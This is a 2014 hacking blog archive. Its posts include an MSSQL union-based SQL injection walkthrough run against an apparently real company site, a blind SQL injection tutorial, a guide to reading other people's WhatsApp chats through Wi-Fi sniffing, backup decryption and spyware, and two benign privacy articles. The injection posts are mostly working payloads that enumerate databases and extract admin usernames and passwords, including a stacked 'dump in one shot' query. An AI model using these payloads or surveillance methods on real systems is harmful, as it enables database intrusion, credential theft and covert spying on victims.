Saturday 15 November 2014

Step by Step MSSQL UNION BASED INJECTION

    MSSQL UNION BASED INJECTION

 

In the Name of ALLAH, the Most Beneficent and the Merciful.

So today i am going to write a tutorial on MSSQL injection. Hope you like it. But first i sujjest you that you must read the basics of sql Injection.
So lets start....

for this tutorial we will use that site..

http://aquaservices.co.in/Product.aspx?Id=13

So the checking, The 1st part is same as MySQL first putting the  single quote ( ' ) and then putting double quote ( " ) checking the error and i came to know this one is single quote based injection.

http://aquaservices.co.in/Product.aspx?Id=13'

It shows error like that.
 


INFORMATION::
When both Single quote and double Quotes gives error then there are high probablities that the injection type is integer based because Single quote based then double quote do not give error and when the injection is double quote based then single quote do not give error, and when both single quote and double quotes give error then apply the golden rule that the injection is integer type.

Now we need to know the comment type for MSSQL.
   

Lets try with the basics. (--)
http://aquaservices.co.in/Product.aspx?Id=13--

Home page but missing contents.

http://aquaservices.co.in/Product.aspx?Id=13 order by 1 --

Same as above.

http://aquaservices.co.in/Product.aspx?Id=13 order by 100--

          Error.
"The ORDER BY position number 100 is out of range of the number of items in the select list. "
  



Now we can do with order by and at last we come to know that 8 is the last working column. Now the next part is using using the union select query.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select 1,2,3,4,5,6,7,8-


What again got the error.

Operand type clash: text is incompatible with int
 


In case of Such Errors in Union select statement we have an option to use null in all columns, so lets try that shit.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select null,null,null,null,null,null,null,null--

we got another error.
  

The text data type cannot be selected as DISTINCT because it is not comparable.

Heres one more type of error you can find while doing MSSQL Injection and the solution of that error is just use "Union All Select" in place of "Unoin Select", Lets try that shit again.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select null,null,null,null,null,null,null,null--

Again Error.. >.<

Conversion from type 'DBNull' to type 'String' is not valid.


The Solution of that type of Errors is as here we can see DBNULL to STRING mismatch so we have to convert each column one by one and see if we can get make it to work. To put a string we can use single quotes but i prefer using the db_name() function to avoid some error. Here we have Eight Columns changing each column one by one could be easy by it could be a pain when there are 20 or more columns so My friend Zenodermus Javanicus developed a payload generator to make that easy for us. I am gonna generate the payloads which will put db_name() in eight columns one by one.

Click Here For Payload
 
 



http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,4,5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave this column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,db_name(),4,5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that columns as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,db_name(),5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,db_name(),6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,db_name(),7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),8--

Here we can see the second Column Getting printed.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,7,db_name()--

Conversion failed when converting the nvarchar value 'AquaService' to data type bit. (Here we can see the Database name in Error)

  There are many other ways also to collect  more information from MSSQL which are given here:
Lets try ...

we can Put @@version on place of vulnerable column to get the current version from database.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,@@version,3,4,5,6,db_name(),8--

Got success..  
  

Now we will extract the table names, here the syntax is different than MySQL of lack of limit clause in MSSQL.


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the first table name : AdminLogin

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the second table name : Certificate

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the Forth table name : ClientList


In the same manner we can get all the tables one by one. Now lets get the columns. I will extract the colums from AdminLogin table.


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 1 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the first column from AdminLogin Table : IsActive

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 2 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the Second column from AdminLogin Table : Password

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 4 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--
We got the Third column from AdminLogin Table : UserName

We got the table names the column names and now lets extrct the data from them. For concatination we can use %2b which is +.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,username%2b' '%2bpassword,3,4,5,6,db_name(),8 from AdminLogin--

At the i would like to show you a DIOS (dump in one shot Querry) made by my friend Zenodermus Javanicus which makes the process alot of faster.http://aquaservices.co.in/Product.aspx?Id=13;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by ZEN ::
'%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name)
from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : '
from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b  CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns
 : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into temp_dios_sample END--


It will give error but actually its making the DIOS table so now lets try checking
 the output under temp_dios_sample.





Hope You Like it.
Thanks.

#stay_connected.

Saturday 1 November 2014

Facebook is now available through Tor


Facebook is now available through Tor for ramped-up privacy

  

The "deep web" is not only home to shady online drug bazaars where you can exchange bitcoins for drugs, but also portals where whistle blowers can safely pass sensitive documents to journalists.

Now, it's also also home to Facebook.

The social network announced on Friday that it is now hosted directly on the Tor network to allow for an even more secure and private way to connect to Facebook.
People using Tor, software that allows for safe and anonymous web browsing, can now connect directly to Facebook using its new onion address (https://facebookcorewwwi.onion/), also known as a hidden service.
"It’s important to us at Facebook to provide methods for people to use our site securely," Alec Muffett, a Facebook security engineer, wrote in a post.
Runa Sandvik, a privacy and security researcher previously employed by the Tor Project, told that the idea of Facebook being hosted on the Tor network came during a conversation with Muffet.
Previously, users could use Tor to connect to Facebook.com, but they would run into a slew of issues — including getting locked out — because the connection would be routed around the world. Thus, it would appear as though a user was connecting from an unusual location, which Facebook treats as a red flag indicating an account has been hacked.
Now, however, you can log on and register on Facebook over Tor using the .onion site without running into these issues, according to Sandvik. "It does provide another level of protection for users who are already using Tor to log on to Facebook."
Connections to Facebook's .onion URL are also end-to-end encrypted, making it harder for hackers, spies or government officials to see what users' actions on the social network.
While some reacted with irony, noting that Facebook is usually not the greatest friend to privacy, others applauded the move.
Facebook's announcement comes just a few weeks after the company's latest privacy controversy. In September, some LGBT users complained of Facebook's real-name policy was preventing them from using the network with the name they identify with — even if it's not their legal one. After the uproar, Facebook apologized and hinted that it was going to change the policy.

Wednesday 29 October 2014

11 free tools to protect your online activity from surveillance

 


You might want more privacy online for any number of reasons — you could be a journalist reporting on a sensitive topic, or you might just want more peace of mind in light of the NSA revelations. To better protect yourself, here are 11 tools (presented in no particular order) to help you encrypt data, block intrusive trackers or remain altogether anonymous on the web. Note that this is by no means an exhaustive list of what's out there, and no security measure is 100% effective. All of the tools listed here are free.

1. Tor Project

Tor is a free software program that allows people to use web connections anonymously. Widely considered to be one of the best privacy tools on the web, Tor can be downloaded as a software package, and there's a Tor-enabled browser available. It's difficult to track information that passes through Tor — so much so that Russian President Vladimir Putin has put up a $110,000 reward for anyone who can crack its secrets.
Where to get it: Direct download

2. The Guardian Project

The Guardian Project creates open-source apps to help people communicate privately. All of the group's software is downloadable for free for Android smartphones. For secure web browsing, there’s a privacy-friendly browser called Orweb that works with a Tor-enabled proxy called Orbot for mobile. There's also a private messaging service called ChatSecure, an app for private phone calls and a pixel-destroying camera tool to blur faces in photos. This project is almost worth a list all its own.
Where to get them: Google Play, Amazon or direct download

3. DuckDuckGo

duckduckgo
DuckDuckGo is a search engine that doesn't track or share any of your information. If you're looking for better privacy, use this over Google.
Where to use it: Duckduckgo.com

4. HTTPS Everywhere

When you're browsing the web, you'll notice that URLs typically have the "http://" prefix, if not the more secure version: "https://" (HTTP Secure). The HTTPS Everywhere browser plugin works with Chrome, Firefox and Opera, and it attempts to automatically switch any HTTP web address over to HTTPS, which encrypts communication between you and the server to protect against eavesdropping or impostors.
Where to get it: Google Play or direct download

5. Ghostery

Ghostery allows you to keep tabs on companies that track your visits to websites. With this browser extension, you can block companies from collecting your browsing data. Ghostery has a popup option that displays a message each time you visit a site with a list of who's tracking you.
When I visited Amazon.com, for example, Ghostery showed me I was being tracked by these entities:
tracker
Where to get it: Direct download

6. Privacy Badger

Privacy Badger is a browser extension that can block third-party advertisers, but it has a moral compass. If Privacy Badger suspects a tracker is overstepping its bounds by tracking what you're doing without your permission, the extension stops the advertiser in its tracks. It's all based on the principle of user consent: If the advertiser breaks the rules, Privacy Badger cuts the cord.
Where to get it: Direct download

7. GPG

You may have heard of PGP (Pretty Good Privacy), an encryption program developed in the early '90s to make email conversations more secure. It's a bit outdated, though. The better option is GPG. The GNU Privacy Guard system allows you to encrypt and sign your data. Each party has a pair of "keys," one public and one private. The sender, in this case, sends the email to the receiver's public key, but this encrypted message can only be deciphered if the receiver enters his or her private key (that is known only to them) upon reception of the communication.

Where to get it for Windows: Direct download
Where to get it for Mac: Direct download

8. Cryptocat

Cryptocat is an encrypted chatting service that can be added as a browser extension or downloaded as an app for Mac systems. It is one of the more popular encryption tools available, often used by journalists and human rights advocates. Put simply, only the sender and receiver can see the actual content of the message. When messages are traveling through Cryptocat, they’re unreadable. As a bonus, the application supports file-sharing.
Where to get it: Direct download

9. Wickr
    

Mashable previously described Wickr as "Snapchat for grownups," and that's a good way to put it. Wickr sends photos, video and file attachments that will eventually be deleted, but unlike Snapchat, Wickr encrypts messages. Not even Wickr itself is supposed to know what's in the messages you send. What you send can last anywhere from a few seconds to several days.
Where to get it: Google Play and the App Store

10. Signal

For phone calls on iPhones, there's an app called Signal, and it's probably the best iOS app available for phone call encryption. Open Whisper Systems, the developer behind Signal, has an Android equivalent called RedPhone that provides end-to-end encryption. Eventually, RedPhone will be rolled into Signal to unify the platform, but the apps are already compatible with each other. Snowden himself has praised Open Whisper Systems for their easy-to-use encryption apps.
Where to get Signal: App Store
Where to get RedPhone: Google Play

11. Surveillance Self-Defense Guide

For those of you who are very serious about ramping up your privacy online, the Electronic Frontier Foundation, a nonprofit group that advocates for civil rights as they pertain to modern technology, has published an extensive index of security tips and explainers for all sorts of Internet users, be they beginners or experts. It's a good place to tread a bit deeper into protecting yourself from unwanted surveillance.
Where to use it: Ssd.eff.org

Stay Connected....



Monday 27 October 2014

Hack Whatsapp Account.



As we know that now days bunch of peoples are using social media and one of the most important is Whats App. Mostly of us connect to each other by Whats App. After a lot of search i just got 3 working whats app hacks and i want to share them with you.

Let's Get Started.

1. WhatsApp Sniffer.


WhatsApp sniffer is a tool for root terminals to read whatsApp chats of a WIFI network. ( works only when open WEP,WPA/WPA2). It captures the conversations, Videos , Pictures that are received by an Android Phone, Nokia, I-Phone on the same WIFI network.

WhatsAppSniffer just use the TCPDump program which reads all the WIFI network packets and filters those which has origin or destination WhatsApp’s servers. All messages are in plain text, so it does not decrypt anything, complying fully with the legal terms of WhatsApp (3.C: “While we do not disallow the use of sniffers Such as Ethereal, tcpdump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp …. “)
For WPA/WPA2 encrypted networks, if uses the tool ARPSpoof (optional).
It has not been tested with W indows Phone terminals. It can’t read the messages written or received by the BlackBerry’s, as they use their own servers and not WhatsApp’s.

 Requirements

  1. A Rooted Android Device.
  2. Your Victim Should Use Same Wi-Fi Through Which you are connected.
  3. WhatsAppSniffer

    2. Decrypting Conversations

    have your victim locked his whatsapp? or you want all his conversation on your PC. Generally for security reasons WhatsApp encrypt Conversation while taking backup in SD Card or Phone Memory.But i have found a tool on XDA that claims to decrypt all the whatsapp conversation down to your PC.
    If you have some access over his device you can also send files from Bluetooth to your device and later read all the conversations.
    This tool is called WhatsApp Xtract and for this all credits goes to ztedd
    Some general advice on how to backup Whatsapp and get the database file:

    Android

    - In Whatsapp go to settings – more – Backup Chats
    - Copy the folder “Whatsapp” on the SD card to your backup location (e.g., PC)
    - (ideally also) use the app Titanium Backup to backup the full whatsapp application together with its data, copy the backup from the folder “TitaniumBackup” on the SD card to your backup location (e.g., PC)
    - Use this tool Whatsapp Backup Extractor (download in this thread) to show the chats in a friendly readable format. The necessary files “wa.db” and “msgstore.db” you will find inside the Titanium Backup archive “com.whatsapp-[Date]-[some digits].tar.gz”, alternatively (without Titanium Backup) you can use the msgstore.db.crypt file from the folder Whatsapp/Databases on the SD card.

    iPhone

    - use Itunes to create an unencrypted Backup
    - use an Iphone Backup Tool to get the file net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or Iphone Backup Extractor. Make sure to create an unencrypted backup with Itunes, as these tools can’t handle encrypted backups. Another possibility are forensic tools like UFED Physical Analyzer.)

    Blackberry

    - sync your blackberry with desktop manager and then copy the messagestore.db file from SD
    - however, it seems that this file is encrypted? Currently we don’t know how to get the unencrypted messagestore.db file
    - Blackberry not supported yet!

    Nokia

     - not known yet
    - Nokia not supported yet!
    For Further Detail about this Method you can move to this Forum of XDA.

    3. Using Spywares

    Using 3rd Party Spywares can be very useful for spying not only WhatsApp Conversation but also many things like, you can able to Track GPS Location, you can capture the lock screen passwords and they can be also used for monitoring Websites. there are many spywares in the market but i recommend is BOSSPY. Because it’s free 


     This article is for educational purposes only. we are not responsible for actions of any individual

Sunday 19 October 2014

BLIND SQL INJECTION

BLIND SQL INJECTION 


   In the Name of ALLAH the Most Beneficent and the Merciful.
Blind sql injection
Today I am going to post a Tutorial on Blind Sql Injection.
Why we call it blind as we cant see anything we dont know anything what we do is just keep asking question from the database and get the reply in form of yes (Page loaded Normally) or NO (Page dint Loaded Normally).

Hope you got knowledge about basics of Sql Injection.
If you Don't have then check these.:
  • Click Here  ....::: SQL Injection Error Based:::...
  • Click Here  ...::: SQL Injection Union Based:::...



Blind Sql Injection is used when there is no output nor any error of sql injection. So that's mean that we can't use union based injection in which we get our desired output, nor error based and Xpath injections in which we get our desired output by a error.

In
Blind SQL injection we make our own queries from the database and ask it that we are right or wrong.


Lets start...


  www.vuln-web.com/photo.php?id=1/ No error Web loaded again normally. 


  www.vuln-web.com/photo.php?id=1'  No error Web loaded again normally. 


   www.vuln-web.com/photo.php?id=1'    No Error But we found a small change in the Website which is       diffrent from others. 

As we din't got the Error let us start with  the Blind SQL injection.Our next task is to try the Commenting out the rest of Query part using out Comment Types.

www.vuln-web.com/photo.php?id=1'--
No Error but The Small change is still there

www.vuln-web.com/photo.php?id=1'%23
No Error & even that change is not there

www.vuln-web.com/photo.php?id=1'/*
No Error but The Small change is still there


www.vuln-web.com/photo.php?id=1'-- 
No Error but The Small change is still there

That means we can comment out the Query using '#'. So we will continue with this one. Time to test is the Injection is really working fine.
www.vuln-web.com/photo.php?id=1' and true%23 
Normal Page returned 
www.vuln-web.com/photo.php?id=1' and false%23
 Page din't Load As normally it do as the query din't returned anything.

That is good. we are on the right track now lets start the Blind SQL injection. 

There are again Two Ways for Blind SQL injection
1. First for N00bz like me who dont have common sense.
2. Second is for proffesional who have good common sense.

Let us First Discuss the First one.

In this injection we will use two new functions which is ASCII and Substring Function. Programmer or many others may be dont need any explaination about this. But for those who need explaination on them.

Ascii('a') will return 97 which is the Ascii value of a. So that means we can get the ascii value of any character passed to this function. 

Substring Function 

substring('n00b',1,1) will return n.
substring('n00b',2,1) will return 0.
substring('n00b',3,1) will return 0.
substring('n00b',4,1) will return b.
substring('n00b',5,1) will return empty.

I hope you understand the usage of both of them so now we will use both of them together.

Ascii(substring('n00b',1,1)) Now the substring function will return n then the ascii will return the Ascii value of n which is 110.

okay using both of these functions will help us quering the database. So lets check the Internal Query part.

Select column_name from table_name where id='input' and Ascii(substring('n00b',1,1))>100;

The above query will give the output Sucessfully as its true now when we 

Select column_name from table_name where id='input' and Ascii(substring('n00b',1,1))>110;

It will return false as 110 is not smaller than 110. So this is how we will inject and query. Let us move to the injection part.
www.vuln-web.com/photo.php?id=1' and Ascii(substring((<your_query_here_which_returns_one_row>),1,1))<any_number_here%23
We can start retrieving the database name. But i suggest we can move the important part first checking if we have something juicy stuff inside, rather than just peeking inside shit. Injection:
www.vuln-web.com/photo.php?id=1' and  and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97%23
By the above Query we queried if the first character of first table under the current database greater than a. If it returns true (Page loads Normally) then we will increase it and check
www.vuln-web.com/photo.php?id=1' and  and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>110%23
By the above Query we queried if the first character of first table under the current database greater than n. If it returns true (Page loads Normally) then we will increase it and check. Let us assume it dint returned true, it returend False (Page dint Loaded Normally). Now we will decrease and check.
www.vuln-web.com/photo.php?id=1' and  and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>105%23
Lets assume is retured True. So now we know that the alphabet is between 105 and 110
www.vuln-web.com/photo.php?id=1' and  and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=106%23
False


www.vuln-web.com/photo.php?id=1' and  and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=107%23
False


www.vuln-web.com/photo.php?id=1' and  and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=108%23
True
So this is it. Now we know the first cahracter in this manner we will keep increasing the SubString Second parameter Number. and try to get out the whole table Name. And i really dont feel that i need to by typing the rest of commands to continue this injection. As any one who read rest of the tutorial can figure out the rest of the part. But actually i dont like this one as its so slow. so i somehow figured out one other injection which can make the Blind injection faster. So lets move to that one. Here the injection struction is like this. Getting started with the second one Getting the Database Name:
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%')%23
Okay here in the above query you can understand the basic things as i suppose you read the other tutorials, so the only thing new in this one is 'dual' and like statement. Dual is a table for testing so we can use it :D. you can go for Dual table in mysql wikipedia if you like to goto its root. over there what i know is that u can use it and continue the injection. Now the 'Like' statement this is used in place of = operator but using like we can actually use windcard character. If you dont know What is wildcard characters, then i ll suggest this place is not for you. Okay there are two Wildcard character which we are going to use they are '_' which stands for single character and '%' which stands for multiple character. Following are some examples for the Wild Characters usage.
Select username from users where city like '%degora%';
Will output all the usernames from table users whos city colunm contains degora.

Select city from users where username like 'n00%'
Will output all the cities whos username column starts with n00 or equals to n00.


Select city from users where username like '___'
i used 3 underscores which means any 3 characters so this will output any city having 3 character username.


Select username,password wehre city like 'u_t__%'
Over here i queried for usernames and password where city starts with 'u' and having 't' on third place and having atleast 5 characters. So any name which fits it will be passed.
Now let us start our Injection using this method. So the good thing about this injection we can guess and we can also check any character if exists in that word and after collecting this info we can make some nice guesses by our own. Let us First check The Number of characters in current Database Name.
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '_____')%23 (we started from 5)
False

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '______')%23 (Now we chaecked 6)
False

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '_______')%23 (Now we checked 7)
True
So now we know it have 7 characters. Now lets check the common characters a,e,i,o,u,s,t,r,h
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%a%')%23
True

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%e%')%23
True

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%i%')%23
False

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%o%')%23
False

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%u%')%23
False
And so on. After collecting this information let us assume we got a,e,d,b,s,_,1 Its the database so we can make a guess it makes the word 'dbase_1' to make sure we are correct we can check it out
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() = 'dbase_1')%23
True
We got the Database name now lets target tables containing any column name which contains the string "pass".
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%')%23
We searched for the first table name which contains columns like pass. If the Query returns true that means there is some output. So now we can start guessing out the name after Couting the number of Characters.
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '____')%23
False

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '_____')%23
True
So we got 5 characters. Now we can start geussing the characters.
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%a%')%23
We checked A

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%s%')%23
We checked 'S'

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%d%')%23
We Checked 'D'
Let us assume we got e,s,r,u after getting this we can quickly the the last will be again s which will make 'users'. Let us try
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like 'users')%23
True
okay it worked now we will try to get the columns in the same way i will just give the example query. and u can use the same method to get the data. You can even try for common names. 
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select column_name from information_schema.columns where table_schema=database() and table_name='users' and column_name like '%username%' limit 0,1) like '%')%23
if they return true then you dont have to waste your time in guessing characters.
in the end the last query to get the admin password we can use:
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select password from users wehre username like '%admin%' limit 0,1) like '%')%23
I hope it helped to understand the internal workring and to understand how to inject Blind sql injection in a web application.